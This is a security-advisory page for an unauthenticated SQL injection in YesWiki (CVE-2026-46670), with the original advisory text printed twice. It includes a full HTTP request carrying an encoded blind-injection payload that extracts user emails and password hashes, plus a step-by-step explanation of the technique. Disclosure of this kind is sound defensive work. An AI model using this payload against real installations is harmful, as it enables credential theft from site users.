Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
CVE-2026-46670: YesWiki: Unauthenticated SQL Injection Allows Database Access
GHSA-jwvv-qr7q-cv8j
CVE-2026-46670
Summary
YesWiki installations are vulnerable to SQL injection attacks, allowing attackers to access the entire database, including usernames, emails, and hashed passwords. This is a serious security risk that can lead to unauthorized access to sensitive user information. To protect your installation, update to the latest version or apply the necessary patches.
What to do
- Update yeswiki yeswiki to version 4.6.4.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| composer | yeswiki | yeswiki |
< 4.6.4 Fix: upgrade to 4.6.4
|
Original title
YesWiki: Unauthenticated SQL Injection
Original description
### Summary
An unauthenticated SQL injection in the Bazar form-import path (`FormManager::create()`) allows any unauthenticated visitor of a default YesWiki install to inject arbitrary SQL into an `INSERT` statement and read the full database, including `yeswiki_users.password` hashes. Present in 4.6.1 / 4.6.2 / current `doryphore-dev`; analyzed against upstream commit `1f485c049db030b94c047ec219e63534ac81142e`.
### Details
Sink is at `FormManager::create()` (function at L232), unquoted concatenation of `bn_id_nature` into the `INSERT VALUES` list at https://github.com/YesWiki/yeswiki/blob/1f485c049db030b94c047ec219e63534ac81142e/tools/bazar/services/FormManager.php#L258
Reachability is unauthenticated.
### PoC
1. Clone the repo (test was done on 1f485c049db030b94c047ec219e63534ac81142e)
2. Bring up the service using docker: `cd docker && docker compose build && docker compose up`
3. Go to `https://localhost:8085`
4. Go through the installation
5. Run the POC:
[yeswiki_sqli_poc.py](https://github.com/user-attachments/files/27578633/yeswiki_sqli_poc.py)
<img width="672" height="54" alt="image" src="https://github.com/user-attachments/assets/fc9a9adf-7d09-442b-bcc1-8edf1bdcf0a1" />
### Impact
Sql injection.
An attacker can dump the whole db, including usernames, emails, and hashed passwords.
### More details
Sample http request (copied from burp):
```
POST /?BazaR&vue=formulaire HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Length: 353
Host: localhost:8085
User-Agent: Python-urllib/3.13
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
imported-form%5B7791000%2BASCII%28SUBSTRING%28%28SELECT%2F%2A%2A%2FHEX%28CONCAT%28email%2C0x3a%2Cpassword%29%29%2F%2A%2A%2FFROM%2F%2A%2A%2Fyeswiki_users%2F%2A%2A%2FLIMIT%2F%2A%2A%2F1%29%2C1%2C1%29%29%5D=%7B%22bn_label_nature%22%3A+%22zz_poc_7790000_1%22%2C+%22bn_template%22%3A+%22%22%2C+%22bn_description%22%3A+%22%22%2C+%22bn_condition%22%3A+%22%22%7D
```
#### POC internals:
The PoC uses an expression like:
`7330000 + ASCII(SUBSTRING((SELECT HEX(VERSION())), 1, 1))`
**Breakdown**
`SELECT HEX(VERSION())` or whatever the statement is (the poc file dumps 1 username and password)
This gets the database version and hex-encodes it.
Example:
```
VERSION() = 9.7.0
HEX(VERSION()) = 392E372E30
```
Then:
`SUBSTRING((SELECT HEX(VERSION())), 1, 1)` takes one character from that hex string.
For position 1, this returns `3`, then: `ASCII(...)` converts that character to its ASCII code: `ASCII('3') = 51`
Then:
`7330000 + 51` produces `7330051`
So the full vulnerable insert becomes roughly:
```
INSERT INTO yeswiki_nature (..., bn_id_nature, ...)
VALUES (7330000 + ASCII(SUBSTRING((SELECT HEX(VERSION())), 1, 1)), "fr-FR", ...);
```
MySQL evaluates the expression before storing it, so the inserted row has: `bn_id_nature = 7330051`
The PoC reads that ID from `/?api/forms`, subtracts `7330000`, gets `51`, converts `51` back to '3', and repeats for the next character.
An unauthenticated SQL injection in the Bazar form-import path (`FormManager::create()`) allows any unauthenticated visitor of a default YesWiki install to inject arbitrary SQL into an `INSERT` statement and read the full database, including `yeswiki_users.password` hashes. Present in 4.6.1 / 4.6.2 / current `doryphore-dev`; analyzed against upstream commit `1f485c049db030b94c047ec219e63534ac81142e`.
### Details
Sink is at `FormManager::create()` (function at L232), unquoted concatenation of `bn_id_nature` into the `INSERT VALUES` list at https://github.com/YesWiki/yeswiki/blob/1f485c049db030b94c047ec219e63534ac81142e/tools/bazar/services/FormManager.php#L258
Reachability is unauthenticated.
### PoC
1. Clone the repo (test was done on 1f485c049db030b94c047ec219e63534ac81142e)
2. Bring up the service using docker: `cd docker && docker compose build && docker compose up`
3. Go to `https://localhost:8085`
4. Go through the installation
5. Run the POC:
[yeswiki_sqli_poc.py](https://github.com/user-attachments/files/27578633/yeswiki_sqli_poc.py)
<img width="672" height="54" alt="image" src="https://github.com/user-attachments/assets/fc9a9adf-7d09-442b-bcc1-8edf1bdcf0a1" />
### Impact
Sql injection.
An attacker can dump the whole db, including usernames, emails, and hashed passwords.
### More details
Sample http request (copied from burp):
```
POST /?BazaR&vue=formulaire HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Length: 353
Host: localhost:8085
User-Agent: Python-urllib/3.13
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
imported-form%5B7791000%2BASCII%28SUBSTRING%28%28SELECT%2F%2A%2A%2FHEX%28CONCAT%28email%2C0x3a%2Cpassword%29%29%2F%2A%2A%2FFROM%2F%2A%2A%2Fyeswiki_users%2F%2A%2A%2FLIMIT%2F%2A%2A%2F1%29%2C1%2C1%29%29%5D=%7B%22bn_label_nature%22%3A+%22zz_poc_7790000_1%22%2C+%22bn_template%22%3A+%22%22%2C+%22bn_description%22%3A+%22%22%2C+%22bn_condition%22%3A+%22%22%7D
```
#### POC internals:
The PoC uses an expression like:
`7330000 + ASCII(SUBSTRING((SELECT HEX(VERSION())), 1, 1))`
**Breakdown**
`SELECT HEX(VERSION())` or whatever the statement is (the poc file dumps 1 username and password)
This gets the database version and hex-encodes it.
Example:
```
VERSION() = 9.7.0
HEX(VERSION()) = 392E372E30
```
Then:
`SUBSTRING((SELECT HEX(VERSION())), 1, 1)` takes one character from that hex string.
For position 1, this returns `3`, then: `ASCII(...)` converts that character to its ASCII code: `ASCII('3') = 51`
Then:
`7330000 + 51` produces `7330051`
So the full vulnerable insert becomes roughly:
```
INSERT INTO yeswiki_nature (..., bn_id_nature, ...)
VALUES (7330000 + ASCII(SUBSTRING((SELECT HEX(VERSION())), 1, 1)), "fr-FR", ...);
```
MySQL evaluates the expression before storing it, so the inserted row has: `bn_id_nature = 7330051`
The PoC reads that ID from `/?api/forms`, subtracts `7330000`, gets `51`, converts `51` back to '3', and repeats for the next character.
ghsa CVSS3.1
9.8
Vulnerability type
CWE-89
SQL Injection
Published: 22 May 2026 · Updated: 22 May 2026 · First seen: 22 May 2026